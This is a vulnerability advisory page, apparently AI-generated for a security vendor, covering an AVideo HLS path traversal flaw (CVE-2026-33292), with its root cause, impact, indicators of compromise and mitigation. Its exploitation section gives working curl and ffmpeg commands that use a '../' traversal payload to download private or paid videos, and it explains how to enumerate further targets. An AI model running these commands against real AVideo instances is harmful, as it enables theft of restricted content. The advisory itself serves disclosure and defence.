CVE-2026-33292: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33292 is an authorization bypass via path traversal vulnerability in the HLS streaming endpoint (view/hls.php) of WWBN AVideo, an open-source video platform. It allows unauthenticated attackers to stream any private, unlisted, or paid video by exploiting a split-oracle condition in the videoDirectory GET parameter. All AVideo versions up to and including 25.0 are affected; the fix is included in version 26.0. The vulnerability carries a CVSS v3.1 base score of 7.5 (High) (GitHub Advisory). It was published on March 18, 2026, and added to the NVD on March 22, 2026 (GitHub Advisory).

Technical details

The root cause is CWE-22 (Path Traversal): the videoDirectory GET parameter in view/hls.php is processed by two independent code paths that interpret the input differently, creating a split-oracle condition. The authorization lookup (getVideoFromFileName in objects/video.php:1685-1688) splits the input on / and uses only the first segment (e.g., public_video) for the database query and permission check. However, the file path construction function (getPathToFile in objects/video.php:4622-4638) preserves the full traversal sequence, ultimately resolving public_video/../private_video/index.m3u8 to /videos/private_video/index.m3u8 on the filesystem. No .. filtering, realpath() validation, or web server path normalization applies to query parameters, leaving the traversal fully exploitable without authentication (GitHub Advisory, AVideo Commit).

Impact

Successful exploitation allows any unauthenticated attacker to stream private, unlisted, or paid video content without authorization, resulting in a high confidentiality impact with no integrity or availability effect. Monetized content protected by pay-per-view or subscription gates can be accessed for free, causing direct financial harm to platform operators and content creators. Because video filenames follow predictable patterns (e.g., video_YYYYMMDD_XXXXX), an attacker with access to a single public video can enumerate and exfiltrate the entire video library of an AVideo instance — a risk that applies to virtually all deployments, as having at least one public video is the default configuration (GitHub Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of concrete curl commands and ffmpeg instructions that reproduce the attack against a real AVideo instance (GitHub Advisory). No authentication or special privileges are required, and attack complexity is low, making the vulnerability trivially exploitable by any network-accessible attacker. There is no current evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.038% (0.074% per the advisory), placing it in the 22nd percentile for exploitation likelihood within 30 days (GitHub Advisory). The vulnerability is not listed in the CISA KEV catalog as of the time of this report.

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances (versions ≤ 25.0) using search engines or tools like Shodan. Locate at least one publicly accessible video and note its filename (e.g., public_video). Video filenames follow the pattern video_YYYYMMDD_XXXXX, enabling enumeration of additional targets.
  2. Confirm target video is restricted: Send a direct request to verify the private video is inaccessible:
curl -s "https://target.com/view/hls.php?videoDirectory=private_video" | head -5
# Expected: "HLS.php Can not see video [ID] (private_video) cannot watch (ID)"
  1. Craft the path traversal payload: Construct a videoDirectory parameter that uses the known public video name followed by /../ and the target private video name: public_video/../private_video.
  2. Exploit the split-oracle to obtain the HLS playlist: Send the crafted request to the HLS endpoint:
curl -s "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
  -H "Accept: application/vnd.apple.mpegurl"
# Expected: Valid M3U8 playlist containing private_video's HLS segments

The authorization check passes against public_video (accessible), while the filesystem serves private_video's content. 5. Stream or download the private video: Use the returned M3U8 playlist with an HLS-capable player or ffmpeg to download the full video:

ffmpeg -i "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
  -c copy stolen_video.mp4
  1. Scale the attack: Enumerate additional private or paid videos by iterating over predictable filename patterns and repeating steps 2–5 (GitHub Advisory).

Indicators of compromise

  • Network: Unusual HTTP GET requests to /view/hls.php containing ../ sequences in the videoDirectory parameter (e.g., ?videoDirectory=public_video/../private_video); high-volume or automated requests to the HLS endpoint from a single IP, consistent with enumeration of video filenames.
  • Logs: Web server access logs showing requests to hls.php with videoDirectory values containing ..; successful HTTP 200 responses (returning M3U8 content) for videoDirectory values that include traversal sequences referencing non-public video directories.
  • Application Logs: AVideo error logs (_error_log) showing access to video IDs that do not match the videoDirectory first segment, or absence of expected "cannot watch" denial messages for restricted content that was nonetheless served.
  • File System: Unexpected access timestamps on private or paid video HLS segment files (.ts, .m3u8) in the videos storage directory, particularly outside of normal user activity hours (GitHub Advisory).

Mitigation and workarounds

Upgrade AVideo to version 26.0 or later, which includes the security fix committed by the maintainer (commit bc03406) (AVideo Commit). The patch adds .. detection and rejection at the top of view/hls.php and a realpath() boundary check in getPathToFile() to ensure resolved paths remain within the videos directory. As a temporary workaround if immediate upgrade is not possible, add input sanitization to view/hls.php to reject any videoDirectory value containing .., and implement rate limiting on the HLS streaming endpoint to slow enumeration attacks. Additionally, consider replacing predictable video filename patterns with randomized, non-enumerable identifiers to reduce the attack surface (GitHub Advisory).

Community reactions

The vulnerability was reported by a researcher identified as "offset" and published by AVideo maintainer DanielnetoDotCom on March 18, 2026 (GitHub Advisory). Community discussion was noted on Bluesky shortly after disclosure, and several vulnerability intelligence platforms (VulDB, CIRCL, Tenable, INCIBE) indexed the CVE within days of publication. A technical write-up was published by Infinit Security detailing the authorization bypass mechanism (Feedly). Overall community reaction highlighted the severity of the split-oracle design flaw and the ease of exploitation given predictable filename patterns.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-65954HIGH8.6
  • PHP logoPHP
  • composer://phpcsstandards/phpcsutils
NoYesSep 29, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb10.11
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management